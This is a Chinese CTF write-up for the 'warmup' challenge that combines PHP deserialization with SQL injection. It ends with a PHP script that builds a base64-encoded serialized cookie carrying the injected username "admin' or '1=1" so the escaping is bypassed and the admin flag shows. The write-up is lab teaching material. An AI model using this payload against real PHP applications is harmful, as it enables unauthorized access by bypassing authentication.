首页 > 数据库 >warmup(php反序列化+SQL注入)

warmup(php反序列化+SQL注入)

时间:2024-07-02 14:42:49浏览次数:11  
标签:index php warmup echo Cookie SQL 序列化

warmup(php反序列化+SQL注入)

  • 题目界面

    单看题目界面的话推测可能是SQL注入。

  • 题解

    题目涉及三个附近,主要从index.php和conn.php入手。

    • index.php中有两个功能,一个是检查请求中的Cookie,一个是检查用户提交的用户名和密码。

      • 检查Cookie

        首先要求Cookie中的变量是一个数组,然后检查其中的ip字段值是否与目标值相等。

      • 检查用户名和密码

        在这一部分中,服务器对输入的用户名和密码进行了转义处理:addlashes() ,该函数针对的目标是单引号、双引号和nul值。

    • conn.php文件主要实现了数据库连接的逻辑

      • 检查用户是否为admin,如果是的话显示flag

      • waf,可以看到过滤的非常严格,可以用到的基本只剩下单引号

      • 存在一个魔术方法:_wakeup 该方法非常关键。

    • 漏洞利用的整体思路为,构造Cookie中的序列化字段last_login_info,构成SQL注入。在index.php中调用unserialize方法后会自动调用魔术方法_wakeup,_wakeup实现连接数据库并检查连接的合法性,此时可以绕过index.php中的转义,从而使用单引号实现SQL注入。

      需要注意的是,此时会调用两次数据库的连接,在检查用户提交字段的逻辑部分,index.php会调用sql→connect,这部分的输入依然会报错,但是已经不重要了,因为在Cookie的SQL注入已经达到了显示flag的目的。

      <?php
          class SQL{
              public $table = 'users';
              public $username = "admin' or '1=1";
              public $password = '123';
              #此处是为了测试_wakeup调用的时机,可以删掉
              public function __wakeup(){
                  if (!isset ($this->conn)) {
                      echo "\n";
                      echo "!isset";
                  }
                  else{
                      echo "\n";
                      echo "YES!";
                  }   
              }
          }
          $sql = new SQL();
          $wp = array(
              'ip' => '39.144.137.29',
              'sql' => $sql,
          );
          #unserialize (base64_decode ($_COOKIE['last_login_info']));
          echo serialize($wp);
          #这一部分是需要设置的Cookie字段
          echo base64_encode(serialize ($wp));
          $last_login_info = unserialize (base64_decode (base64_encode(serialize ($wp))));
          echo "\n";
          echo $last_login_info['ip'];
      ?>
      
      

标签:index,php,warmup,echo,Cookie,SQL,序列化
From: https://www.cnblogs.com/yuanyy/p/18279812

相关文章

  • 修改yum安装的php的启动用户
    在使用yum安装php时,默认情况下,安装完成后php的启动用户是apache1、编辑php-fpm的配置文件。在大多数Linux系统中,php-fpm的配置文件路径为/etc/php-fpm.d/www.conf。2、找到配置文件中的`user`和`group`项。默认情况下,`user`的值是apache,`group`的值是apache,即php启动用户和用户......
  • PHP8.0正常,PHP7.2,PHP7.3报错Connection failed: SQLSTATE[HY000] [2054] The server
    构建网站API接口的时候,使用了PDO进行数据库连接,原文如下 测试后发现,PHP8.0版本下,可以正常输出,但是PHP7.2和7.3则会报错:Connectionfailed:SQLSTATE[HY000][2054]Theserverrequestedauthenticationmethodunknowntotheclient经查验,发现因为所用的PHP7.2和7.3版本不支......
  • PHP与js遍历的区别,PHP运行原理学习
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width,initial-scale=1.0"><title><?phpecho'PHP的第一......
  • [开源分享]好用的在线客服系统 PHP客服系统源码 聊天源码(开源代码+终身使用+安装教程
    源码介绍PHP在线客服系统源码采用全新UI,重新设计前端界面,后台采用php+mysql,免费开源源码。在线客服系统已成为企业与客户之间沟通的重要渠道。通过在线客服系统,企业可以方便地与客户进行实时沟通和解决问题,提升客户满意度。php客服系統源码主要功能要求:全新UI自动回复和机器......
  • php 获取微信用户的openId
    //这里的code是通过前端页面获取的//$appid="公众号在微信的appid";//$secret="公众号在微信的appsecret";publicfunctionuserOpenId($appid,$secret,$code){$url="https://api.weixin.qq.com/sns/jscode2session?appid=$appid&secret=$secret&......
  • uniapp+thinkphp5实现微信登录
    前言之前做了微信登录,所以总结一下微信授权登录并获取用户信息这个功能的开发流程。配置1.首先得在微信公众平台申请一下微信小程序账号并获取到小程序的AppID和AppSecrethttps://mp.weixin.qq.com/cgi-bin/loginpage?url=%2Fwxamp%2Fwacodepage%2Fgetcodepage%3Ftoken%3D4180......
  • Swagger php注解常用语法梳理
    Swaggerphp注解常用语法梳理快速编写你的RESTFULAPI接口文档工具,通过注释定义接口和模型,可以和代码文件放置一起,也可以单独文件存放。Swagger优势通过代码注解定义文档,更容易保持代码文档的一致性模型复用,减少文档冗余,带来更可靠的文档提供客户端访问接口,可以直接......
  • PHP转Go系列 | GET 和 POST 请求的使用姿势
    大家好,我是码农先森。说到HTTP请求工具想必对我们做Web开发的程序员都不陌生,只要涉及到网络请求都必须使用。对于我们PHP程序员来说,最熟悉不过的就是CURL扩展,只要安装的这个扩展便可随意发起HTTP请求。但在PHP语言中还有一个很好用的Composer包「guzzlehttp/guzzl......
  • PHP 面向对象编程(OOP)入门指南
    面向对象编程(Object-OrientedProgramming,简称OOP)是一种编程范式,通过使用对象来设计和组织代码。PHP作为一种广泛使用的服务器端脚本语言,支持面向对象编程。本文将介绍PHP面向对象编程的基本概念和用法,并提供示例代码帮助理解。一、面向对象编程的基本概念1.1类和对象......
  • thinkphp3.2.x漏洞分析
    tp3.2.31.开始入口文件就是www/index.php,index.php包含了框架的入口文件,所以访问后可以直接加载thinkphp框架配置文件thinkphp的配置文件在www/ThinkPHP/Conf/convention.phpurl大小写url默认是大小写敏感的,也可以通过修改convertion.php,达到url不区分大小写的目的'URL_C......